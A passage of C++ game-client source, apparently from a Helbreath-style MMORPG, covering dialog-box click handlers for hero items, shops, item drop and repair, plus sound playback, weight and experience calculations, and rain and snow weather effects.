 		{	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 407;
  			if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 408;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 409;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 410;
  			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
  			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU49,strlen(DRAW_DIALOGBOX_CITYHALL_MENU49));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		// Hero's Armor
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 185) && (msY <= sY + 200))
 		{  	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 411;
  			if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 412;
 	 		if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 413;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 414;
  			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
  			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU50,strlen(DRAW_DIALOGBOX_CITYHALL_MENU50));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		// Hero's Robe
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 215) && (msY <= sY + 230))
 		{	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 415;
  			if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 416;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 417;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 418;
  			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
  			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU51,strlen(DRAW_DIALOGBOX_CITYHALL_MENU51));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		// Hero's Hauberk
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 245) && (msY <= sY + 260))
  		{	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 419;
	  		if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 420;
	  		if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 421;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 422;
  			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
  			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU52,strlen(DRAW_DIALOGBOX_CITYHALL_MENU52));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		// Hero's Leggings
 		if ((msX >= sX + 35) && (msX <= sX + 220) && (msY >= sY + 275) && (msY <= sY + 290))
 		{  	if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 423;
  			if((m_bAresden == TRUE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 424;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 1)) iReqHeroItemID = 425;
  			if((m_bAresden == FALSE) && (m_pCharList[m_cCurFocus-1]->m_sSex == 2)) iReqHeroItemID = 426;
  			ZeroMemory(m_cTakeHeroItemName,sizeof(m_cTakeHeroItemName));
  			memcpy(m_cTakeHeroItemName,DRAW_DIALOGBOX_CITYHALL_MENU53,strlen(DRAW_DIALOGBOX_CITYHALL_MENU53));
  			m_stDialogBoxInfo[13].cMode = 11;
  			m_stDialogBoxInfo[13].sV1=iReqHeroItemID;
  			PlaySound('E', 14, 5);
 		}
 		break;

	case 8:
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Yes
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_CANCELQUEST, NULL, NULL, NULL, NULL, NULL);
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// No
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	case 9:
		if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Yes
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_HUNTMODE, NULL, NULL, NULL, NULL, NULL);
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// No
			m_stDialogBoxInfo[13].cMode = 0;
			PlaySound('E', 14, 5);
		}
		break;

	case 10:
		if( m_iTeleportMapCount > 0 )
		{	for( int i=0 ; i<m_iTeleportMapCount ; i++ )
			{	if( (msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + 130 + i*15) && (msY <= sY + 144 + i*15) )
				{	bSendCommand(MSGID_REQUEST_CHARGED_TELEPORT, NULL, NULL, m_stTeleportList[i].iIndex, NULL, NULL, NULL);
					DisableDialogBox(13);
					return;
		}	}	}
		break;

	case 11: // Fix Drawjer
		 if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_GETHEROMANTLE, NULL, m_stDialogBoxInfo[13].sV1, NULL, NULL, NULL);
		  	m_stDialogBoxInfo[13].cMode = 0;
		  	PlaySound('E', 14, 5);
		}
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY))
		{	m_stDialogBoxInfo[13].cMode = 7;
		  	PlaySound('E', 14, 5);
		}
 		break;
	}
}

void CGame::CivilRightAdmissionHandler(char *pData)
{WORD * wp, wResult;
 char * cp;

	wp   = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	wResult = *wp;

	switch (wResult) {
	case 0:
		m_stDialogBoxInfo[13].cMode = 4;
		break;

	case 1:
		m_stDialogBoxInfo[13].cMode = 3;
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		ZeroMemory(m_cLocation, sizeof(m_cLocation));
		memcpy(m_cLocation, cp, 10);
		if (memcmp(m_cLocation, "aresden", 7) == 0)
		{	m_bAresden = TRUE;
			m_bCitizen = TRUE;
			m_bHunter  = FALSE;
		}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
		{	m_bAresden = TRUE;
			m_bCitizen = TRUE;
			m_bHunter  = TRUE;
		}else if (memcmp(m_cLocation, "elvine", 6) == 0)
		{	m_bAresden = FALSE;
			m_bCitizen = TRUE;
			m_bHunter  = FALSE;
		}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
		{	m_bAresden = FALSE;
			m_bCitizen = TRUE;
			m_bHunter  = TRUE;
		}else
		{	m_bAresden = TRUE;
			m_bCitizen = FALSE;
			m_bHunter  = TRUE;
		}
		break;
	}
}

void CGame::DlgBoxClick_Text(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[18].sX;
	sY = m_stDialogBoxInfo[18].sY;

	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		DisableDialogBox(18);
		PlaySound('E', 14, 5);
	}
}

void CGame::DlgBoxClick_Inventory(short msX, short msY)
{int i, sX, sY;
	sX = m_stDialogBoxInfo[2].sX;
	sY = m_stDialogBoxInfo[2].sY;
	if ((msX >= sX +23) && (msX <= sX +76) && (msY >= sY +172) && (msY <= sY +184))
	{	if( m_iGizonItemUpgradeLeft == NULL )
		{	m_iGizonItemUpgradeLeft = 0;
		}
		EnableDialogBox(34, 5, NULL, NULL);
		PlaySound('E', 14, 5);

	}
	if ((msX >= sX +140) && (msX <= sX +212) && (msY >= sY +172) && (msY <= sY +184))
	{	if (m_cSkillMastery[13] == 0)
		{	AddEventList(DLGBOXCLICK_INVENTORY1, 10);
			AddEventList(DLGBOXCLICK_INVENTORY2, 10);//"The manufacturing manual is purchasable in Blacksmith."
		}else if (m_bSkillUsingStatus == TRUE)
		{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY5, 10);//""You are already using another skill."
			return;
		}else if (_bIsItemOnHand() == TRUE)
		{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY4, 10);//""Your hands should be free to use this item."
			return;
		}else
		{	for (i = 0; i < DEF_MAXITEMS; i++)
			if (   (m_pItemList[i] != NULL) && (m_pItemList[i]->m_cItemType == DEF_ITEMTYPE_USE_SKILL_ENABLEDIALOGBOX)
				&& (m_pItemList[i]->m_sSpriteFrame == 113)
				&& (m_pItemList[i]->m_wCurLifeSpan > 0))
			{	EnableDialogBox(26, 3, NULL, NULL, NULL);
				AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY12, 10);//"Using a manufacturing skill..."
				PlaySound('E', 14, 5);
				return;
			}
			AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY14, 10);
		}
		PlaySound('E', 14, 5);
	}
}

void CGame::DlgBoxClick_Character(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[1].sX;
	sY = m_stDialogBoxInfo[1].sY;


	if ((msX >= sX + 15) && (msX <= sX + 15 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY)) {
		EnableDialogBox(28, 1, NULL, NULL);
		DisableDialogBox(1);
		PlaySound('E', 14, 5);
	}
	else if ((msX >= sX + 98) && (msX <= sX + 98 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY)) {
		EnableDialogBox(32, NULL, NULL, NULL);
		DisableDialogBox(1);
		PlaySound('E', 14, 5);
	}
	else if ((msX >= sX + 180) && (msX <= sX + 180 + DEF_BTNSZX) && (msY >= sY + 340) && (msY <= sY + 340 + DEF_BTNSZY)) {
		EnableDialogBox(12, NULL, NULL, NULL);
		DisableDialogBox(1);
		PlaySound('E', 14, 5);
	}
}

void CGame::DlgBoxClick_MagicShop(short msX, short msY)
{
 int i, iCPivot, iYloc, iAdjX, iAdjY ;
 short sX, sY;

	sX = m_stDialogBoxInfo[16].sX;
	sY = m_stDialogBoxInfo[16].sY;

	iAdjX = -20 ;
	iAdjY = -35 ;

	iCPivot = m_stDialogBoxInfo[16].sView*10;

	iYloc = 0;
	for (i = 0; i < 9; i++) {
		if ((m_pMagicCfgList[iCPivot + i] != NULL) && (m_pMagicCfgList[iCPivot + i]->m_bIsVisible)) {
			if ((msX >= sX + iAdjX + 44) && (msX <= sX + iAdjX + 135 + 44) && (msY >= sY + iAdjY + 70 + iYloc +35) && (msY <= sY + iAdjY + 70 + 14 + iYloc +35)) {
				if (m_cMagicMastery[iCPivot + i] == 0)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_STUDYMAGIC, NULL, NULL, NULL, NULL, m_pMagicCfgList[iCPivot + i]->m_cName);
					PlaySound('E', 14, 5);
				}
				return;
			}
			iYloc += 18;
		}
	}

	if ((msX >= sX + iAdjX + 42 +31) && (msX <= sX + iAdjX + 50 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 0;
	if ((msX >= sX + iAdjX + 55 +31) && (msX <= sX + iAdjX + 68 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 1;
	if ((msX >= sX + iAdjX + 73 +31) && (msX <= sX + iAdjX + 93 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 2;
	if ((msX >= sX + iAdjX + 98 +31) && (msX <= sX + iAdjX + 113 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 3;
	if ((msX >= sX + iAdjX + 118 +31) && (msX <= sX + iAdjX + 129 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 4;
	if ((msX >= sX + iAdjX + 133 +31) && (msX <= sX + iAdjX + 150 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 5;
	if ((msX >= sX + iAdjX + 154 +31) && (msX <= sX + iAdjX + 177 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 6;
	if ((msX >= sX + iAdjX + 181 +31) && (msX <= sX + iAdjX + 210 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 7;
	if ((msX >= sX + iAdjX + 214 +31) && (msX <= sX + iAdjX + 230 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 8;
	if ((msX >= sX + iAdjX + 234 +31) && (msX <= sX + iAdjX + 245 +31) && (msY >= sY + iAdjY + 248 +35) && (msY <= sY + iAdjY + 260 +35))
		m_stDialogBoxInfo[16].sView = 9;
}

void CGame::_RemoveChatMsgListByObjectID(int iObjectID)
{
 int i;

	for (i = 1; i < DEF_MAXCHATMSGS; i++)
	if ((m_pChatMsgList[i] != NULL) && (m_pChatMsgList[i]->m_iObjectID == iObjectID)) {
		delete m_pChatMsgList[i];
		m_pChatMsgList[i] = NULL;
	}
}

void CGame::PlaySound(char cType, int iNum, int iDist, long lPan)
{
 int iVol;

	if (m_bSoundFlag == FALSE) return;
	if (m_bSoundStat == FALSE) return;

	if (iDist > 10) iDist = 10;

	iVol = (m_cSoundVolume - 100)*20;
	iVol += -200 * iDist;

	if (iVol > 0) iVol = 0;
	if (iVol < -10000) iVol = -10000;

	if (iVol > -2000) {

		switch (cType) {
		case 'C':
			if (m_pCSound[iNum] == NULL) return;
			m_pCSound[iNum]->Play(FALSE, lPan, iVol);
			break;

		case 'M':
			if (m_pMSound[iNum] == NULL) return;
			m_pMSound[iNum]->Play(FALSE, lPan, iVol);
			break;

		case 'E':
			if (m_pESound[iNum] == NULL) return;
			m_pESound[iNum]->Play(FALSE, lPan, iVol);
			break;
		}
	}
}

void CGame::_DrawBlackRect(int iSize)
{
 int ix, iy, sx, sy, dcx, dcy;
 DWORD dwTime;

	dwTime = timeGetTime();

	dcx = 40 - iSize*2;
	dcy = 30 - iSize*2;

	sx = iSize*16;
	sy = iSize*16;

	for (ix = 0; ix < dcx; ix++) {
		m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(ix*16 + sx, iSize*16,       12, dwTime);
		m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(ix*16 + sx, 464 - iSize*16, 12, dwTime);
	}

	for (iy = 0; iy < dcy; iy++) {
		m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(iSize*16,       iy*16 + sy, 12, dwTime);
		m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(624 - iSize*16, iy*16 + sy, 12, dwTime);
	}
}

BOOL CGame::_bCheckItemByType(char cType)
{
 int i;

	for (i = 0; i < DEF_MAXITEMS; i++)
	if ( (m_pItemList[i] != NULL) && (m_pItemList[i]->m_cItemType == cType) ) return TRUE;

	return FALSE;
}


void CGame::DynamicObjectHandler(char * pData)
{
 WORD * wp;
 char * cp;
 short * sp, sX, sY, sV1, sV2, sV3;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE);
	wp = (WORD *)cp;
	cp += 2;

	sp = (short *)cp;
	sX = *sp;
	cp += 2;

	sp = (short *)cp;
	sY = *sp;
	cp += 2;

	sp = (short *)cp;
	sV1 = *sp;
	cp += 2;

	sp = (short *)cp;
	sV2 = *sp;		   // Dyamic Object Index
	cp += 2;

	sp = (short *)cp;
	sV3 = *sp;
	cp += 2;

	switch (*wp) {
	case DEF_MSGTYPE_CONFIRM:// Dynamic Object
		m_pMapData->bSetDynamicObject(sX, sY, sV2, sV1, TRUE);
		break;

	case DEF_MSGTYPE_REJECT:// Dynamic object
		m_pMapData->bSetDynamicObject(sX, sY, sV2, NULL, TRUE);
		break;
	}
}

BOOL CGame::_bIsItemOnHand() // Snoopy: Fixed to remove ShieldCast
{int i;
 WORD wWeaponType;
	for (i = 0; i < DEF_MAXITEMS; i++)
	if ((m_pItemList[i] != NULL) && (m_bIsItemEquipped[i] == TRUE))
	{	if (   (m_pItemList[i]->m_cEquipPos == DEF_EQUIPPOS_LHAND)
			|| (m_pItemList[i]->m_cEquipPos == DEF_EQUIPPOS_TWOHAND))
			return TRUE;
	}
	for (i = 0; i < DEF_MAXITEMS; i++)
	if ((m_pItemList[i] != NULL) && (m_bIsItemEquipped[i] == TRUE))
	{	if (m_pItemList[i]->m_cEquipPos == DEF_EQUIPPOS_RHAND)
		{	wWeaponType = ((m_sPlayerAppr2 & 0x0FF0) >> 4);
			// Snoopy 34 for all wands.
			if ((wWeaponType >= 34) && (wWeaponType < 40)) return FALSE;
			else return TRUE;
	}	}
	return FALSE;
}

int CGame::_iCalcTotalWeight()
{
 int i, iWeight, iCnt, iTemp;
	iCnt = 0;
	iWeight = 0;
	for (i = 0; i < DEF_MAXITEMS; i++)
	if (m_pItemList[i] != NULL)
	{	if (   (m_pItemList[i]->m_cItemType == DEF_ITEMTYPE_CONSUME)
			|| (m_pItemList[i]->m_cItemType == DEF_ITEMTYPE_ARROW) )
		{	iTemp = m_pItemList[i]->m_wWeight * m_pItemList[i]->m_dwCount;
			if (strcmp(m_pItemList[i]->m_cName, "Gold") == 0) iTemp = iTemp / 20;
			iWeight += iTemp;
		}else iWeight += m_pItemList[i]->m_wWeight;
		iCnt++;
	}

	return iWeight;
}

void CGame::DlgBoxClick_15AgeMsg(short msX, short msY)
{	// Snoopy: removed feedback card
	short sX, sY;
	sX = m_stDialogBoxInfo[5].sX;
	sY = m_stDialogBoxInfo[5].sY;
    if ((msX >= sX + 120 ) && (msX <= sX + 120 + DEF_BTNSZX ) && (msY >= sY + 127 ) && (msY <= sY + 127 + DEF_BTNSZY))
	   DisableDialogBox(5);
}


void CGame::DlgBoxClick_WarningMsg(short msX, short msY)// .
{	short sX, sY;
	sX = m_stDialogBoxInfo[6].sX;
	sY = m_stDialogBoxInfo[6].sY;

    if ((msX >= sX + 120 ) && (msX <= sX + 120 + DEF_BTNSZX ) && (msY >= sY + 127 ) && (msY <= sY + 127 + DEF_BTNSZY))
	   DisableDialogBox(6);
}

void CGame::DlgBoxClick_ItemDrop(short msX, short msY)
{	short sX, sY;
	if (m_cCommand < 0) return;

	sX = m_stDialogBoxInfo[4].sX;
	sY = m_stDialogBoxInfo[4].sY;

	if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + 55) && (msY <= sY + 55 + DEF_BTNSZY))
	{
	    m_stDialogBoxInfo[4].cMode = 3;
        bSendCommand(MSGID_COMMAND_COMMON,
                     DEF_COMMONTYPE_ITEMDROP,
                     NULL,
                     m_stDialogBoxInfo[4].sView,
                     1,
                     NULL,
                     m_pItemList[m_stDialogBoxInfo[4].sView]->m_cName);
		DisableDialogBox(4);
	}

	else if ((msX >= sX + 170 ) && (msX <= sX + 170 + DEF_BTNSZX ) && (msY >= sY + 55 ) && (msY <= sY + 55 + DEF_BTNSZY))
	{

		for (int i = 0; i < DEF_MAXSELLLIST; i++)
	         m_bIsItemDisabled[i] = FALSE;

		DisableDialogBox(4);
	}
    else if ((msX >= sX + 35) && (msX <= sX + 240 ) && (msY >= sY + 80) && (msY <= sY + 90))
	{
	   m_bItemDrop = !m_bItemDrop;
	}
}

void CGame::DlgBoxClick_ItemSellorRepair(short msX, short msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[23].sX;
	sY = m_stDialogBoxInfo[23].sY;

	switch (m_stDialogBoxInfo[23].cMode) {
	case 1:
		if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Sell
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_SELLITEMCONFIRM, NULL, m_stDialogBoxInfo[23].sV1, m_stDialogBoxInfo[23].sV4, m_stDialogBoxInfo[23].sV3, m_pItemList[m_stDialogBoxInfo[23].sV1]->m_cName); //v1.2
			m_stDialogBoxInfo[23].cMode = 3;
		}
		if ((msX >= sX + 154) && (msX <= sX + 154 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Cancel
			m_bIsItemDisabled[ m_stDialogBoxInfo[23].sV1 ] = FALSE;
			DisableDialogBox(23);
		}
		break;

	case 2:
		if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Repair
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_REPAIRITEMCONFIRM, NULL, m_stDialogBoxInfo[23].sV1, NULL, NULL, m_pItemList[m_stDialogBoxInfo[23].sV1]->m_cName);
			m_stDialogBoxInfo[23].cMode = 4;
		}
		if ((msX >= sX + 154) && (msX <= sX + 154 + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			// Cancel
			m_bIsItemDisabled[ m_stDialogBoxInfo[23].sV1 ] = FALSE;
			DisableDialogBox(23);
		}
		break;
	}
}


unsigned long CGame::iGetLevelExp(int iLevel)
{unsigned long iRet;
	if (iLevel == 0) return 0;
	iRet = iGetLevelExp(iLevel - 1) + iLevel * ( 50 + (iLevel * (iLevel / 17) * (iLevel / 17) ) );
	return iRet;
}

int CGame::_iGetTotalItemNum()
{ int i, iCnt;
	iCnt = 0;
	for (i = 0; i < DEF_MAXITEMS; i++)
	if (m_pItemList[i] != NULL) iCnt++;
	return iCnt;
}

BOOL CGame::bCheckExID(char * pName)
{	if (m_pExID == NULL) return FALSE;
	if (memcmp(m_cPlayerName, pName, 10) == 0) return FALSE;
	char cTxt[12];
	ZeroMemory(cTxt, sizeof(cTxt));
	memcpy(cTxt, m_pExID->m_pMsg, strlen(m_pExID->m_pMsg));
	if (memcmp(cTxt, pName, 10) == 0) return TRUE;
	else return FALSE;
}

void CGame::DrawWhetherEffects()
{
#define MAXNUM 1000
	static int ix1[MAXNUM];
	static int iy2[MAXNUM];
	static int iFrame[MAXNUM];
	static int iNum = 0;
	int i;
	short dX, dY, sCnt;
	char cTempFrame;
	DWORD dwTime = m_dwCurTime;

	switch (m_cWhetherEffectType) {
	case 1:
	case 2:// Rain
	case 3: // rain with rocks
		switch (m_cWhetherEffectType) {
		case 1: sCnt = DEF_MAXWHETHEROBJECTS / 5; break;
		case 2:	sCnt = DEF_MAXWHETHEROBJECTS / 2; break;
		case 3:	sCnt = DEF_MAXWHETHEROBJECTS;     break;
		case 4:	sCnt = DEF_MAXWHETHEROBJECTS * 2; break;
		}

		for (i = 0; i < sCnt; i++)
		{
			if ((m_stWhetherObject[i].cStep >= 0) && (m_stWhetherObject[i].cStep < 20) && (m_stWhetherObject[i].sX != 0))
			{
				dX = m_stWhetherObject[i].sX - m_sViewPointX;
				dY = m_stWhetherObject[i].sY - m_sViewPointY;
				cTempFrame = 16 + (m_stWhetherObject[i].cStep / 6);
				m_pEffectSpr[11]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			}
			else if ((m_stWhetherObject[i].cStep >= 20) && (m_stWhetherObject[i].cStep < 25) && (m_stWhetherObject[i].sX != 0))
			{
				dX = m_stWhetherObject[i].sX - m_sViewPointX;
				dY = m_stWhetherObject[i].sY - m_sViewPointY;
				m_pEffectSpr[11]->PutTransSprite(dX, dY, m_stWhetherObject[i].cStep, dwTime);
			}
		}
		break;

	case 4:
	case 5:
	case 6: // Snow
		switch (m_cWhetherEffectType) {
		case 4: sCnt = DEF_MAXWHETHEROBJECTS / 5; break;
		case 5:	sCnt = DEF_MAXWHETHEROBJECTS / 2; break;
		case 6:	sCnt = DEF_MAXWHETHEROBJECTS;     break;
		case 7:	sCnt = DEF_MAXWHETHEROBJECTS * 2; break;
		}
		for (i = 0; i < sCnt; i++)
		{
			if ((m_stWhetherObject[i].cStep >= 0) && (m_stWhetherObject[i].cStep < 80))
			{
				dX = m_stWhetherObject[i].sX - m_sViewPointX;
				dY = m_stWhetherObject[i].sY - m_sViewPointY;

				// Snoopy: Snow on lower bar
				if (dY >= 600)
				{
					cTempFrame = 39 + (m_stWhetherObject[i].cStep / 20) * 3;
					dX = m_stWhetherObject[i].sBX;
					dY = 600;
				}
				else cTempFrame = 39 + (m_stWhetherObject[i].cStep / 20) * 3 + (rand() % 3);

				m_pEffectSpr[11]->PutTransSprite(dX, dY, cTempFrame, dwTime);

				if (m_bIsXmas == TRUE)
				{
					if (dY == 600)
					{
						ix1[iNum] = dX;
						iy2[iNum] = dY + (rand() % 5);
						iFrame[iNum] = cTempFrame;
						iNum++;
					}
					if (iNum >= MAXNUM) iNum = 0;
				}
			}
		}
		if (m_bIsXmas == TRUE)
		{
			for (i = 0; i <= MAXNUM; i++)
			{
				if (iy2[i] > 10) m_pEffectSpr[11]->PutTransSprite(ix1[i], iy2[i], iFrame[i], dwTime);
			}
		}
		break;
	}
}

//cambiado
void CGame::WhetherObjectFrameCounter()
{
	int i;
	short sCnt;
	char  cAdd;
	DWORD dwTime = m_dwCurTime;

	if ((dwTime - m_dwWOFtime) < 30) return;
	m_dwWOFtime = dwTime;

	switch (m_cWhetherEffectType) {
	case 1:
	case 2:
	case 3: // Rain
		switch (m_cWhetherEffectType) {
		case 1: sCnt = DEF_MAXWHETHEROBJECTS / 5; break;
		case 2:	sCnt = DEF_MAXWHETHEROBJECTS / 2; break;
		case 3:	sCnt = DEF_MAXWHETHEROBJECTS;     break;
		case 4:	sCnt = DEF_MAXWHETHEROBJECTS * 2; break;
		}
		for (i = 0; i < sCnt; i++)
		{
			m_stWhetherObject[i].cStep++;
			if ((m_stWhetherObject[i].cStep >= 0) && (m_stWhetherObject[i].cStep < 20))
			{
				cAdd = (40 - m_stWhetherObject[i].cStep);
				if (cAdd < 0) cAdd = 0;
				m_stWhetherObject[i].sY = m_stWhetherObject[i].sY + cAdd;
				if (cAdd != 0)
					m_stWhetherObject[i].sX = m_stWhetherObject[i].sX - 1;
			}
			else if (m_stWhetherObject[i].cStep >= 25)
			{
				if (m_bIsWhetherEffect == FALSE)
				{
					m_stWhetherObject[i].sX = 0;
					m_stWhetherObject[i].sY = 0;
					m_stWhetherObject[i].cStep = 30;
				}
				else
				{
					m_stWhetherObject[i].sX = (m_pMapData->m_sPivotX * 32) + ((rand() % 940) - 200) + 300;
					m_stWhetherObject[i].sY = (m_pMapData->m_sPivotY * 32) + ((rand() % 800) - 600) + 240;
					m_stWhetherObject[i].cStep = -1 * (rand() % 10);
				}
			}
		}
		break;

	case 4:
	case 5:
	case 6:
		switch (m_cWhetherEffectType) {
		case 4: sCnt = DEF_MAXWHETHEROBJECTS / 5; break;
		case 5:	sCnt = DEF_MAXWHETHEROBJECTS / 2; break;
		case 6:	sCnt = DEF_MAXWHETHEROBJECTS;     break;
		case 7:	sCnt = DEF_MAXWHETHEROBJECTS * 2; break;
		}
